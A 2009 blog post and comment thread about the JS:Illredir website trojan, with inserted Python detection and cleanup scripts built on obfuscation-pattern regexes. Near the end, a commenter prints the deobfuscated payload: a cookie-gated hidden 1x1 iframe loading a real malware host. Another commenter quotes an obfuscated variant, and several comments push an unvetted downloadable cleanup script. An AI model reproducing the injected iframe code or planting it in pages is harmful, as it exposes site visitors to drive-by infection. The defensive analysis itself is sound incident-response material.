Trojan Attack: JS:Illredir-B [Trj]

It’s 3.30am and way past my bedtime, but I feel this is extremely important and I must highlight this to everyone.

A few days ago, one of my website clients complained that the blog I had set up for them on their server using WordPress could not be accessed. When I checked, it appeared to have a PHP header problem and I had no idea why it should occur, but I merely upgraded the WordPress installation and that seemed to solve the problem. Because he had that problem, I thought I had better check all my other WordPress blogs on our own hosted servers; they all had the same problem.

I thought that WordPress was probably having a Christmas party and had caused all WordPress blogs to fail. I didn’t have time to check whether all other WordPress users had the same problem, but it was solved easily enough by upgrading the installation.

Later, though, the same client told me that one of their staff who was updating some things on their website (the non-WordPress main section) discovered a Trojan called JS:Illredir-B [Trj] when she accessed their website. A brief Google search using that name unearthed nothing, although I found sites describing similar issues:

http://www.prelovac.com/vladimir/warning-website-virus-attack

http://forum.avast.com/index.php?topic=52476.0

About the Trojan

What’s so dangerous about Trojans? A Trojan is harmful software that appears to do what you asked of it while quietly doing something else: sending information (credit card numbers, personal details, financial records and so on) to someone else, or tampering with what your browser loads so that you are redirected to other websites without your knowledge. For example, you may type your bank’s address in by hand, but the altered code reroutes you to a phishing website that looks identical to the real one.

I’m not sure about what this Trojan really does – I’m not a virus expert. If anyone knows, or when I do find out, I’ll update.

Protect Yourself

I haven’t researched enough or spoken to enough people to find out which of their antiviruses work. It’s in the middle of the night so very few people are awake. All I can say here is, I’m using AVG and this antivirus did not detect the trojan. My client himself who uses Avira also said it was not detected. I’m not here to promote any particular antivirus actually, but my client’s staff (the one who detected it) used Avast Antivirus, so perhaps this may be a good one to use.

http://www.avast.com/

How Do We Tell Which Websites Are Under Attack?

Well, in my case, all the websites I was taking care of appeared to have been attacked. I’ve managed to fix them, but I’ll have to keep an eye on them to make sure that they aren’t attacked again.

I’d like to appeal to everyone out there to be aware of this and to help where you can. My guess is that it is possible that there are many websites out there that have been attacked, but the owners or webmasters are unaware of it. This is because the webpage does not look any different from what it usually does, and this is why it’s so dangerous! Please note that the website owners themselves may not be the perpetrators, and are victims. If you have found any website that has been subjected to the trojan attack, please help out by informing the website owner and/or webmaster right away so that action can be taken.

Here is how you can find out whether the website has been attacked:

  1. Website seems to be loading slower than usual.
  2. When the website is loading, check the status bar. If the status bar indicates that there is some traffic being routed to websites of unusual names that are not related to the current website in any way, it is very possible that the website has been attacked.
  3. The easiest way to find out is to take a look at the page source. Go all the way to the bottom. If there is something similar to the following after </html>, the website has been attacked. This code, which appears to be gibberish, may also appear anywhere INSIDE the page instead of after </html>, so do not stop at the end of the file.

[Image: trojan.gif, the injected code referred to above as it appears in the page source]

How to view the page source:

  • Internet Explorer: View menu > Source
  • Firefox: View menu > Page Source
  • Google Chrome: Right-click anywhere on the page > View page source
  • Opera: View menu > Page Source
  • Safari: Right-click anywhere on the page > View Source OR View menu > View source
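The checks in points 2 and 3 above can be applied to saved page source by a script instead of by eye. The following is an added example and is not code from the original post: it reports anything that appears after the closing </html> tag, and it scores every inline script block against a few obfuscation indicators (eval/unescape, String.fromCharCode, document.write, a 1x1 or hidden iframe, and a body made up largely of %XX or \xXX escapes). Any one indicator on its own is common in legitimate code, so a block is only reported when two or more apply. The sample page is constructed, and example.invalid is a placeholder host, not a domain from the original report.

```python
import re

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
HTML_CLOSE_RE = re.compile(r"</html\s*>", re.IGNORECASE)
ESCAPE_RE = re.compile(r"%[0-9a-fA-F]{2}|\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}")

# Obfuscation indicators. Each is common in legitimate code on its own, so a
# script block is only reported when at least two of them apply.
MARKERS = {
    "eval": re.compile(r"\beval\s*\("),
    "unescape": re.compile(r"\bunescape\s*\("),
    "fromCharCode": re.compile(r"String\.fromCharCode"),
    "document.write": re.compile(r"document\.write\s*\("),
    "hidden iframe": re.compile(
        r"iframe\b.{0,200}?(?:width\s*=\s*['\"]?[01]\b|display\s*:\s*none)",
        re.IGNORECASE | re.DOTALL),
}


def escape_density(code):
    """Fraction of the script body consumed by %XX, \\xXX or \\uXXXX escapes."""
    if not code:
        return 0.0
    return sum(len(m) for m in ESCAPE_RE.findall(code)) / len(code)


def script_indicators(code):
    """Names of the obfuscation indicators that apply to one script body."""
    hits = [name for name, rx in MARKERS.items() if rx.search(code)]
    if escape_density(code) > 0.05:
        hits.append("escape-heavy")
    return hits


def find_injections(html):
    """Findings for one page: content after the last </html>, plus every
    inline script block with two or more obfuscation indicators."""
    findings = []
    closes = list(HTML_CLOSE_RE.finditer(html))
    if closes:
        tail = html[closes[-1].end():].strip()
        if tail:
            findings.append({"where": "after </html>",
                             "reasons": ["content after closing tag"],
                             "snippet": tail[:80]})
    for m in SCRIPT_RE.finditer(html):
        body = m.group(1).strip()
        if not body:
            continue  # <script src="..."></script>: nothing inline to inspect
        reasons = script_indicators(body)
        if len(reasons) >= 2:
            findings.append({"where": "script at offset %d" % m.start(),
                             "reasons": reasons, "snippet": body[:80]})
    return findings


# Constructed sample page: one legitimate inline script, one injected hidden
# iframe inside <body>, and one injected escape-heavy block after </html>.
# example.invalid is a placeholder host (assumption, not from the report).
SAMPLE_PAGE = """<html><head><title>Shop</title>
<script src="/js/functions.js"></script>
</head><body><p>Welcome</p>
<script>
var page = 'home'; document.title = page;
</script>
<script>document.write('<iframe width=1 height=1 src="http://example.invalid/b2b/" style="display:none"></iframe>')</script>
</body></html>
<script>try{eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65'))}catch(e){}</script>
"""

CLEAN_PAGE = "<html><body><script>var a = 1;</script></body></html>\n"

if __name__ == "__main__":
    for finding in find_injections(SAMPLE_PAGE):
        print(finding["where"], finding["reasons"], repr(finding["snippet"]))
```

Run it over a file saved from "View page source"; the offsets let you jump straight to the block in an editor. A page that produces no findings is not proven clean (the indicators are heuristics, and an external script file can carry the payload instead), so also check each .js file the page loads.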

Fixing The Websites

For those of you who own websites and would like to know how to remove the trojan, it’s easy – just remove the extra code. Not all files are affected, I’ve found that mostly the following files are affected:

  • Files named index or have the word index in them. E.g. index.html, index.php, index.htm, index_main.htm
  • Files named home or have the word home in them. E.g. home.html, homepage.htm
  • Files named main or have the word main in them. E.g. main.html, main_page.htm
  • Files named header or have the word header in them. E.g. header.php, header.inc, header_main.php
  • Files named footer or have the word footer in them. E.g. footer.php, footer.inc, footer_main.php
  • All javascript files with the .js extension. E.g. javascript.js, functions.js

Expect every folder on the server to be affected: the root folder, its subfolders, the subdomains, and the subfolders within the subdomains.

While some forums suggest that only Linux servers are affected, I’ve found some of my clients who use Windows servers are also affected.

I think there are scripts available for you to download and run on your server so that they automatically scan and remove the code from all affected files, but I didn’t look for them because other users warned that some of those files carry the virus themselves. Removing the code file by file is tedious, of course. What I did was check the last-modified date of the files: in my case, the files were altered on 24th and 25th December 2009, so I could easily pick out which files had been modified, and I either removed the code by hand or re-uploaded my local copy to the server. A modification date is only a hint, though: an upload can preserve or reset timestamps, so a file with an old date is not proof that it is clean. It’s tedious, but I know it works.
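The procedure above (restrict attention to the listed file types, pick out files modified inside the infection window, strip the extra code, keep a copy of what you changed) as an added example. It is not code from the original post and it is not the cleanup script discussed in the comments. The injected signature, the file names and the timestamps are constructed; in practice you copy the signature verbatim from one infected file. It also shows why the name list above should not be trusted on its own: a contact.html touched in the same window is missed by name-based triage and caught by time-based triage, which is why the default scans every code file in the window.

```python
import os
import shutil
import tempfile
from datetime import datetime

NAME_HINTS = ("index", "home", "main", "header", "footer")
CODE_EXTS = (".html", ".htm", ".php", ".inc", ".js")

# Constructed stand-in for the injected block; copy the real one from an
# infected file, byte for byte, including any trailing newline.
SIGNATURE = b"<script>try{eval(unescape('%64%6f%63'))}catch(e){}</script>\n"

# The window from the post: files touched on 24 and 25 December 2009.
WINDOW_START = datetime(2009, 12, 24).timestamp()
WINDOW_END = datetime(2009, 12, 26).timestamp()


def is_candidate(path, strict_names):
    """Code files only. With strict_names the name must also contain one of
    the hints from the post; every .js file qualifies regardless."""
    stem, ext = os.path.splitext(os.path.basename(path).lower())
    if ext not in CODE_EXTS:
        return False
    if not strict_names or ext == ".js":
        return True
    return any(hint in stem for hint in NAME_HINTS)


def find_recent_candidates(root, start, end, strict_names=False):
    """Relative paths of candidate files whose mtime lies in [start, end]."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if is_candidate(path, strict_names) and start <= os.path.getmtime(path) <= end:
                hits.append(os.path.relpath(path, root))
    return sorted(hits)


def strip_signature(path, signature, backup=True):
    """Remove every copy of signature from path and return how many were
    removed. The untouched original is kept as path + '.bak'."""
    with open(path, "rb") as fh:
        data = fh.read()
    count = data.count(signature)
    if count == 0:
        return 0
    if backup:
        shutil.copy2(path, path + ".bak")
    with open(path, "wb") as fh:
        fh.write(data.replace(signature, b""))
    return count


def clean_tree(root, signature, start, end, strict_names=False):
    """Map of relative path -> occurrences removed, over files in the window."""
    report = {}
    for rel in find_recent_candidates(root, start, end, strict_names):
        removed = strip_signature(os.path.join(root, rel), signature)
        if removed:
            report[rel] = removed
    return report


def build_sample_site(base):
    """Constructed fixture: three infected files touched inside the window and
    one older clean include; mtimes are set explicitly with os.utime."""
    files = {
        "index.html": (b"<html><body>hi</body></html>\n" + SIGNATURE, datetime(2009, 12, 25, 3)),
        "js/functions.js": (b"function f(){return 1;}\n" + SIGNATURE, datetime(2009, 12, 24, 22)),
        "contact.html": (b"<html><body>mail</body></html>\n" + SIGNATURE, datetime(2009, 12, 25, 4)),
        "inc/header.php": (b"<?php echo 'header'; ?>\n", datetime(2009, 11, 1, 12)),
    }
    for rel, (content, when) in files.items():
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)
        os.utime(path, (when.timestamp(), when.timestamp()))


def run_demo():
    """Build the fixture in a temp dir, compare name-based with time-based
    triage, clean, then rescan without a window to confirm nothing is left."""
    base = tempfile.mkdtemp(prefix="illredir-")
    build_sample_site(base)
    by_name = find_recent_candidates(base, WINDOW_START, WINDOW_END, strict_names=True)
    by_time = find_recent_candidates(base, WINDOW_START, WINDOW_END)
    report = clean_tree(base, SIGNATURE, WINDOW_START, WINDOW_END)
    with open(os.path.join(base, "index.html"), "rb") as fh:
        index_after = fh.read()
    backup_kept = os.path.exists(os.path.join(base, "index.html.bak"))
    rerun = clean_tree(base, SIGNATURE, 0, float("inf"))  # cleaning moved mtimes to now
    shutil.rmtree(base)
    return {"by_name": by_name, "by_time": by_time, "report": report,
            "index_after": index_after, "backup_kept": backup_kept, "rerun": rerun}


if __name__ == "__main__":
    print(run_demo())
```

Once the files are clean, cleaning them has moved their modification times to the present, so a second pass must drop the window (as the rerun does) to confirm the signature is gone everywhere. Delete the .bak copies afterwards: they still contain the injected code, and a browser can request them if the web server serves that extension.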

If anyone has found anything to add to the above, please let me know by email or by commenting. This is pretty dangerous and it’s so malicious… so please be vigilant and do your bit to help out and spread the word.

One more thing I’d like to add: don’t expect your web hosting provider to inform you or to work on the problem for you. The moment I discovered this, I wrote to all the web hosting providers that my different websites reside on to ask them to check how this could have happened, and to ask them to inform their clients, and their responses were all about the same. They asked me to choose a password that was difficult to guess, and one said I was the only account affected – this from a company I had bought several packages from, ALL of which had been attacked.

Zyen Hoo

Zyen is a Physics, Chemistry and Math teacher with many interests, including running and dancing. She also enjoys indulging in vanity projects such as her personal blog, and is a self-proclaimed reviewer. She is also notoriously slow in updating her blog due to her constant search for the next adrenaline rush (on top of her heavy workload at school and her freelancing projects), so she asks for your forgiveness and understanding of her very delayed updates.

  • Mike

    Below is the script removing malicious entries from all affected files. Clean one. As per the article, the main thing is to change the password and not use Total Commander for FTP uploads and/or password storage. http://crafts.hopmart.pl/files/remove-js-illredir-b.php.tar.gz Mike, Cheers

  • Paolo

    This virus spreads through "normal" files. When opened it will edit some of your Windows start-up files, so you won't be able to restart Windows. But before that it will look for an FTP program and log in on each of your sites and do the above. Not a really nice Christmas present. Removing it is quite easy as stated above. Good luck.

  • zyenweb

    Mike, you're a lifesaver. Thank you so much! There was a problem with the script though but I managed to fix it myself ... and it's cleared up all the files for me. Whoo!!! Paolo, you are soooo right. What a way to end 2009 :( You are both right, I'm guessing this trojan has attacked all my websites because I have the passwords saved in my FTP program, so that's the danger. My main problem was that the antivirus I installed did not catch the virus, hence my laptop was affected ... and that's probably why my laptop slowed down considerably. I reformatted my laptop because it was driving me nuts. I learn something new every day.

  • Mihai

    I need help with this. I changed FTP passwords and I used the removal tool; the second I reopen a disinfected file the code is back there. Help please.

  • zyenweb

    Mihai, can I know what your website is so we can take a look? I'll do my best to help you. The script Mike gave above works for me, but I had to modify it because there were a few lines that my server couldn't process even though they look right.

  • Mihai

    I checked some of these removal files and the virus code in them is different from the virus code on my website.

  • Mike

    Hi, It's really easy to modify my original script to remove virtually any unwanted code from a file. I see that the website you've specified here is already clean, however if this is not the case let me know and I will modify the script. Thanks, Mike

  • Jorge

    Dear Mike, Thanks for the script, and so many thanks to the author of this article, this saved my life today... On the 26th of December all my websites were infected... and thanks to this I can clear it (at least one of my webpages). Only one thing, when I start the script I have problems with all files by permissions: Permission denied in xxxxx remove-js-illredir-b.php on line 116. How can I fix this??? Do I need to change the rights for all folders??? Regards

  • @rjen

    Thanks, I was hit as well and managed to remove the codes from all files. $%$@#$!. Does anyone know what the virus does in Windows exactly?

  • Dinesh

    Can you help me also please? My website is http://www.institute.org.in and it is a subdomain basically; the main domain is http://www.aieeehelpline.com. I have copied the script provided by you and the script is accessible at http://www.aieeehelpline.com/remove-js-illredir-b.php . Please help me. I am a newbie.

  • lena

    Please help, I've tried everything. I deleted the trojan file during a virus scan on my PC last week, I've cleared my FTP account and reinstalled the website for the fifth time now. I've used the above script which fixed some of the files, but Avast is still flashing up a warning when viewing the site.

  • Nemo

    A website I am currently working on for a friend was infected with 'JS:Illredir-B [Trj]' which my outdated NOD32 had missed but my friend had detected with Avast. There isn't much to the site yet so we manually removed the script. The file infected was 'home.html'. I have used CuteFTP to upload to the server and had the program remember the user-name and password. How was the file infected? Did the infection start from my end? Within the same day my computer received some odd message that a 'security update has been successfully installed' and my computer instantly restarted itself. No longer able to boot into Windows I did a scan with HijackThis in safe mode and discovered 'siszyd32.exe', a nasty new virus, in my Windows startup. I saw Paolo's post so I thought I would share this as it's possible that there is a link between these two occurrences. Now, should I reinstall Windows or buy a Mac?

  • Libraium

    Hi, I have the same problem with my website, www . librarium . altervista . org I tried Mike's script, but it doesn't work, it tells me: Parse error: syntax error, unexpected T_STRING, expecting T_OLD_FUNCTION or T_FUNCTION or T_VAR or '}' in /membri/librarium/remove-js-illredir-b.php on line 59 Can you help me?

  • zyenweb

    Hi everyone. Sorry for not approving your comments earlier; I hadn't checked my dashboard the past few days. In view of the many comments, I've decided to temporarily allow all comments to be approved since this is a serious issue.

    @Jorge - I managed to clear out my files with Mike's script without any change in permissions. The standard permissions on my folders and subfolders are 755 and the files 644. Are those your permissions too? Maybe Mike can comment to help you out on this.

    @rjen - I'm not sure what the trojan does... still reading up to find out more!

    @Nemo - I think you were infected the same way I was. All my sites which I accessed via FileZilla were infected, as I had FileZilla remember the usernames and passwords, which now obviously is a dangerous thing to do. I think it is very probable that we were infected by another website that our anti-virus did not detect, and hence all our websites were affected! About your computer - perhaps you ought to consider reformatting it? Back everything up first, of course. Mac has fewer virus attacks, but that doesn't mean there are none. It also comes down to how comfortable you are with using Macs. I'm not sure what the price difference is where you are, but here in Malaysia, a Mac costs about 50-100% more than a PC of equivalent specs, so we'd only get a Mac if we really, really want one (and can afford it).

    @Dinesh - I ran the script on your website but your subdomain doesn't seem to be listed, so maybe that's why. Can you try uploading it to the root of your subdomain and then run it from there?

    @Lena - I accessed your website and it seems to be clean now. Are you still facing the same problem?

    @Libraium - I had the same problem too. What I did was put lines 59-62 in comments (envelope them with /* and */) and then it worked like a charm. I'm not sure why those lines don't work, as they look correct; still looking into it.

  • Mike

    @All Latest version of the script so far is from 2010-01-01 23:40 and it has 4545 bytes. I tried this version on all virus mutations referenced here (basically I accessed websites, extracted the virus entry from the html/js page and ran my script); all above virus versions have been successfully removed by this version of the script. If something doesn't work on your website the reasons may be as follows: incompatible php version < 5.0, other virus mutation, you don't have permission (latest version of the script will report that). I will try to include a version number going forward. Please check your version and if it is not the latest one try to re-download and re-run the script. When reporting errors please post the first two digits of your php version (for example 5.1), script version or size in bytes and error details.

    @Libraium This message usually means that you're trying to run a php 5 script on a php 4 engine. You can try to invoke the php5 command instead of just the plain php command. If you have php 5 installed on the server box this should execute the php 5 engine.

    @Jorge The script is modifying files on the server. If you execute the script manually it assumes the permissions of the user executing it. If you execute the script via http it assumes the permissions of your HTTP server user. In general folder write permission is not needed unless you create new files, which is not the case here. All you should need is write permission to a file being healed. As far as folder permissions go you have to be able to read folders, so you can navigate the folder tree. Again, you need to have write permissions to all infected files and read permission to all folders. ("You" means the user executing the script via HTTP or manually.)

  • Jorge

    Dear Mike, I'm executing the script via http because I don't have rights to execute it manually. Anyway... I cleaned all my files for my websites... but today again the virus is in all webpages... really I don't know how I can get free of it... I'm thinking of changing the hosting company, because I can't clean it every 2 days....:(

  • Jorge

    Can you give us the latest version of the script??? In the first post we can get the first version. Regards

  • Mike

    The url is the same, I've only replaced the archive, so if you download it again it's going to be the latest version; size should be 4545 bytes. Also you have to stop using Total Commander and change your FTP password.

  • Mike

    Uploaded latest version. Please clear the browser cache before downloading: http://crafts.hopmart.pl/files/remove-js-illredir-b.php.tar.gz Let me know.

  • Jorge

    Great Mike, Finally I got ssh access to my webserver and I can execute the script (new version looks great ;-) ). I can see that all bad code is out of my files, but there is still a small line there in my case (at the end of the php and js files). Is it necessary to delete it manually??? Or is the deletion of the script command by your script enough? Thanks, I will make a donation at last, in fact it's the least we can do for this great script!!!!!

  • Mike

    @Jorge - I'm glad I could help. The remaining part is a commented out string which is probably some kind of a key used to generate virus (seed) or identify your website by the virus. Without the main virus code it is harmless. I did not remove it because it is hard to distinguish valid website comments from a virus entries and this might do more harm than good. I wouldn't worry too much because of this, however if you could reveal your website address or show us a sample I might be able to verify that and eventually modify the script. Thanks !

  • Jorge

    Ok Mike, You can see it in www.promotecno.es/enfermeria www.promotecno.es/cofares www.promotecno.es/asepeyo www.proyectorpro.com Thanks for your help & Regards! P.S. I hope this virus does not enter again.. ;-)

  • Aidee

    Hi Mike.. Thanks a lot....My website has been attacked too...I used the script to remove the trojan and now it looks fine... Thanks again :)

  • Mike

    Nice to hear this ! Uploaded version 0.93. Fixed some ajax issues and directory permission issues. Have fun :P

  • helio

    Hi Guys How do I run the file remove-js-illredir-b.php.tar to remove the virus? I have tons of files and don't want to do it manually :(

  • helio

    I worked it out. Unzip, upload, run and removes the issues. Thanks a million :)

  • Randy

    I am getting this - it isnt correcting any files, any ideas why. PHP version: 5.2.9-2 Starting ... Cannot open directory ./ASP Compiled Templates Cannot open directory ./History Files processed: 2 Files fixed: 0

  • Mike

    It looks like the user running the script has no permissions to navigate those folders. Is it a Windows server? Does anybody have asp files infected? The script currently fixes php, htm, html, js files but not asp files. This can be easily changed, just e-mail me samples. My e-mail is specified on the contents tab. Thanks!

  • Mike

    It should be on the contact tab :)

  • Janine

    Hello, My site has also been affected and I've taken it off line. I haven't read all the messages or instructions but will try the script tomorrow. @Nemo my netbook was also infected with Security Tool Malware. I was able to remove it with instructions from: http://www.bleepingcomputer.com/virus-removal/remove-security-tool. Thanks for all the information. I'll let y'all know how it goes. jwb

  • Randy

    Sorry Mike, no asp files infected but it didn't correct any files either. I did correct some files I found but I didn't think it was all of them.

  • Jorge

    It is "easy" to clean manually (takes a long time). You only need to look at the time and date of the modified files (all files are modified more or less at the same time), then if you find a modified file, search for that last modification time and you can easily see the files modified. Regards

  • Jon

    Hi... I'm facing the same issue as well.. but according to the virus scanner, I was infected with the JS/TROJANDOWNLOADER.AGENT.NRL.TROJAN. Mike, do you have a file for this? Regards

  • Muki

    Hi ppl, thx for comments, really appreciate it. I have downloaded Mike's script, and when I started it, firstly, it said "Parse error: syntax error, unexpected T_STRING, expecting T_OLD_FUNCTION or T_FUNCTION or T_VAR or ‘}’ in /membri/librarium/remove-js-illredir-b.php on line 84". I put lines 84-87 in comments, and after that, nothing happened, only a blank screen. Of course, the server uses PHP version 4.3.1; is there any solution for this kind of problem?? Best Regards,

  • mache

    Hi, I also got this virus and I've been working on cleaning the mess for days, and I just found this information. I got the script. THANKS! Just... I don't really know how to run it. I unzipped it and I read the instructions, but they are not clear. (Sorry, I'm not a programmer, and I have not much experience with websites, and it is scaring me a lot to try to find out by playing with options to make it work.) Would you please tell me how to run the script. And again... thanks thanks thanks a lot! For all the info, the help, and the support.

  • Tom Colvin

    I've been fighting this infection since 31 Dec. I was notified by WinPatrol that siszyd32 was trying to get into my start-up folder. My blog site administrator has managed to clean out a lot of the infected plug-ins and the /js/ folder, and I've reformatted my HD and upgraded to Win 7. I've also switched to Avast, and it now alerts me of a Trojan [the JS one] whenever I try to write a new blog post or page, or even edit a past page. I've posted about this virus on the WordPress Forum, and the moderator responded, saying he's referred this problem to the WP Security team. Hopefully, we'll have an "official" response from WP soon. The support people at Hostgator intimate that they are getting a lot of "script injections" recently. They've been responsive and helpful -- but my problems are still not resolved.

  • mache

    hey! i just went for it. and i did it. ran it. cleaned it. i'm going to go out to party to celebrate it's done. and we survived it. THANK YOU!!!!!!!!

  • Mike

    @Muki You need PHP5 to run the script, hence the message.

    Brief instructions: Download the script http://crafts.hopmart.pl/files/remove-js-illredir-b.php.tar.gz, unzip to the root folder of your website. Access the script at http://yoursite.com/remove-js-illredir-b.php, click start. If all went ok remove the script. Otherwise correct the file permissions (or other errors the script has reported) and re-run the script (to re-run click the start tab then click the start button again).

  • Mike

    @Georgi please give me the url

  • Georgi

    www.gamezspot.net this is the Url.

  • zyenweb

    @Georgi I had to delete your earlier comment with the JS trojan because it was loading the trojan into my Administrative panel.

  • Georgi

    How to fix my website i try .php file but they don't work for me ?

  • Georgi

    Avast detects virus as JS:Illredir-C [Trj] not B version.

  • @rjen

    Maybe redundant info, but I thought I'd leave the message here anyway: MAKE SURE TO CHANGE YOUR FTP PASSWORD(S). After cleaning the mess manually I forgot to do this, and even though my PC is clean, the next day my sites were infected AGAIN. So the trojan really tries again from a remote source with the stolen password! After changing the passwords (which I should have done immediately of course) all stays well...

  • Mike

    Uploaded version 0.94 http://crafts.hopmart.pl/files/remove-js-illredir-b.php.tar.gz url stays the same. Clear browser's cache before downloading and verify that you've actually downloaded version 0.94. This version supports both IllRedir-B and IllRedir-C. Also fixed some minor issues. Thanks, Mike

  • akire

    I fixed it with “Mass Text Replacer” (download trial):
    - add all files
    - from 1 suspicious file copy the virus code
    - in the program look for “code” and replace with “” or ” ”
    - done

  • Jeff Namnum

    @Mike, I so love you right now ;) I'm not sure if you wrote the original file I used when this happened (remove-virus.php) but this new one is fantastic. The GUI and the fact that it ran through every subdirectory is amazing. I can't believe how much of this crap virus I missed by cleaning manually. THANK YOU!! @zyenweb, thanks for hosting this conversation and taking up your time and bandwidth to make it easy for us to find the solution we need. THANK YOU!!

  • sean walsh

    I found it on a link to buy tickets to see THE NEW MASTERSOUNDS, who are an absolutely fantastic band, on Facebook. I doubt very much they have anything to do with fraud though... I also have Avast.

  • zyenweb

    @Jeff No problem - I don't mind hosting the conversation as long as it helps people out there! And I'm so glad it did. This trojan is one pain in the neck! A million thanks to Mike, his script is a life-saver :)

  • cenzi

    http://takingflightinternational.com This is amazing. You guys are so ahead of anyone right now. I looked and looked everywhere for this info. Great website too btw! I ran into a major issue. First, the fact that the last WordPress update forced me to get php5. I wasn't aware that 1and1.com did not update for me. I was stuck in the same php4 database since I signed up. So I installed phpMyAdmin myself and am now running the database with php5 from there. My problem is that the root is still under php4. Sooo.. what I did was move ALL the files from the website under root/phpmyadmin/check to check for viruses... but all I get is this: Running... PHP version: 5.2.12 Starting ... processed: 353 Files fixed: 0 and nothing more. Any suggestions?

  • cenzi

    Oops.. here it is: http://takingflightinternational.com/phpmyadmin/remove-js-illredir-b.php as opposed to http://takingflightinternational.com/remove-js-illredir-b.php where it gives me the php4 error...

  • Mike

    I just checked your home page and my script was able to fix your virus version which looks like IllRedir-C. You must not have copied your infected files to the correct spot. Infected files must be in the same directory as the script or a subdirectory of it. For example if you place your script under ~/public_html/remove-js-illredir-b.php, you should place your other websites under: ~/public_html/website1, ~/public_html/website2, ~/public_html/website3 ... this way the script will fix all of them at once. In your case you have to place the script as root/phpmyadmin/remove-js-illredir-b.php. Hope this helps.

  • Mike

    Posting again here: Below is the script removing malicious entries from all affected files. It removes IllRedir-B and C entries. Please read instructions before executing the script. http://crafts.hopmart.pl/files/remove-js-illredir-b.php.tar.gz Good luck, Mike

  • Zyenweb

    WARNING, PEOPLE! These trojans are mutating faster than we can keep up. There's a mutation of this trojan called "Illredir-D [Trj]" which I just found out about today. My AVG Free didn't pick it up, but Avast did. @Mike - The script isn't able to clean this out on the site I tested, so I had to make some mods but I daren't post it here in case the mods I made are not correct. This trojan is really getting on my nerves!!! On behalf of everyone here, I'd like to thank both of you who wrote this script so very, very much for taking the time and trouble to create this script and to present it so neatly so that beginners are able to use it quite easily. Also, thank you for putting a link to this page. You're a godsend!

  • Mike

    Guys give me a link to a site infected with IllRedir-D and I will modify the script I will also add an option to clean any arbitrary code from those files.

  • Atanas

    Hi, I just found this page looking for a solution for how to remove JS:Illredir-D [Trj] that I found today in my hosting. My hosting provider said nothing important about that so I started to look in Google. I have a hosting with 3 web sites on it and I suppose that all of them will be affected - www.jivdom.info, www.lotrobg.org, www.vegebg.org. Do you have a solution, guys?

  • valdes

    I send you a link to a website that contains a trojan JS:Illredir-B [Trj]. www.admcourt-varna.com

  • Mike

    Don't see anything wrong with this website; was it cleaned up already?

  • Broom

    Hi Mike, Thanks so much for helping out. I copied the script over to my root directory, but I get a PHP error when I try to run it. The url is: http://www.broombox.com/remove-js-illredir-b.php The error I get is: Parse error: syntax error, unexpected T_STRING, expecting T_OLD_FUNCTION or T_FUNCTION or T_VAR or '}' in /home/broom6/public_html/remove-js-illredir-b.php on line 84 I also tried it in this url: http://www.broombox.com/wp-content/plugins/remove-js-illredir-b.php And get the same Parse error. Thank you so much. Broom

  • Tim

    Hi Mike, I have just removed JS:Illredir-D [Trj] from my solarwarwarmair.com site but it rooted deep into my main site www.solosol.net; try this link: http://www.solosol.net/catalog/index.php I was using AVG and NOD32 on another computer. A customer using 'AVAST' reported it to me yesterday. I changed to AVAST and found JS:Illredir-D [Trj]! Any help greatly appreciated

  • ekimneems

    Does anyone know exactly how this trojan spreads? I used the script to clean all files on all my sites, but it somehow keeps creeping back. It looks like everyone agrees that the source is via FTP, but what is actually injecting the code? Also, if a server has been completely cleaned and an updated antivirus client like Avast or NOD32 is installed, will it catch the trojan before it injects any code or only after those JS files have been created? Thanks!!

  • Mike

    You need to change your FTP passwords. And don't use them with Total Commander and some other FTP clients with no or very poor encryption.

  • Jim

    I've run into this issue on every one of my wordpress sites. The only thing I could think of at the time was to go into my Dashboard and re-install WP 2.9.1 .... will this alleviate the issue? Or will it continue to come back up? I use FileZilla to access my server, but have not physically typed my passwords in quite some time. Instead I have it set up through the program so all I have to do is select the server to login. I could use some help on this. Thank you.

  • Proudcdn

    Hello Mike, Fantastic resource for all of us suffering through this crap. I am stuck on a Linux hosting server running PHP version 4.X (GoDaddy). Is there any script that I can run to clean my sites? One such site is http://spmabc.com I have about 6 other sites that are infected too. Sincerely, Sean

  • Mike

    I will try to port the script so it runs on PHP4 too. There is a new mutation, it starts with /*Exception*/; I will include it in the new version. Please wait for my next post.

  • MIke

    Done http://crafts.hopmart.pl/files/remove-js-illredir-b.php.tar.gz version 0.96
    - Supports PHP 4!
    - Backs up files before modification
    - Contains cure-fix for all files infected with IllRedir-B, IllRedir-C, IllRedir-D, IllRedir-E
    Let me know if you're having any issues with this release. Thanks !

  • Proudcdn

    Hello, The script being added to my sites now looks like this: try{window.onload=function(){document.write('voila-fr.gamespot.com.uol');Izvperx7vl4q = document.getElementById('megaid').innerHTML + '-))c@#$o$m(-#(b^!r$.@&#()s)#)@u@&$^#p@ It does not have the GNU or Exception in front. Any chance the removal tool could be written to deal with this? It currently skips it. Thanks, Sean

  • Mike

    I need a url or samples if you guys want a cure

  • Proudcdn

    Ok so I am 99.9% certain that the trojan, once introduced to your computer, invades your FTP client and grabs the login and password info for your sites. This is how it is able to continually reappear even after you delete and clean-install your site.

  • Cheeko

    I use FileZilla; I think it's not the FTP client but the trojan on the client's PC.

  • Mike

    Uploaded version 0.99 http://crafts.hopmart.pl/files/remove-js-illredir-b.php.tar.gz - restores chmod to 444 - added latest virus mutations

  • Hanok

    Hi Mike, Could you be more specific with what permissions need to be changed when running the script from html? The script file has permissions of 7-5-5. I've also tried the command line. For example, http://jewsandjoes.com/remove-js-illredir-b.php is where I have uploaded the file. Hosted with BlueHost, using CPanel. Have cronjobs, but it fails using the commandline you've given with error: Status: 404 Not Found X-Powered-By: PHP/5.2.11 Content-type: text/html No input file specified.

  • yousf

    I traced the trojan back. It expands to the following code: var today=new Date(), expires=new Date(today.getTime()+2678400000); if(navigator.appVersion.indexOf("MSIE 6")!=-1&&document.cookie.indexOf("_mlsdkf=s")==-1) { ifrm=""; if(today.getTimezoneOffset()==-1) {ifrm=0} document.write(ifrm); document.cookie="_mlsdkf=s;"+" expires="+expires.toGMTString()+"; " }

  • yousf

    ifrm has this value: "iframe width=1 height=1 src='http://seccatm.net/b2b/' style='display:none'"

  • Mike

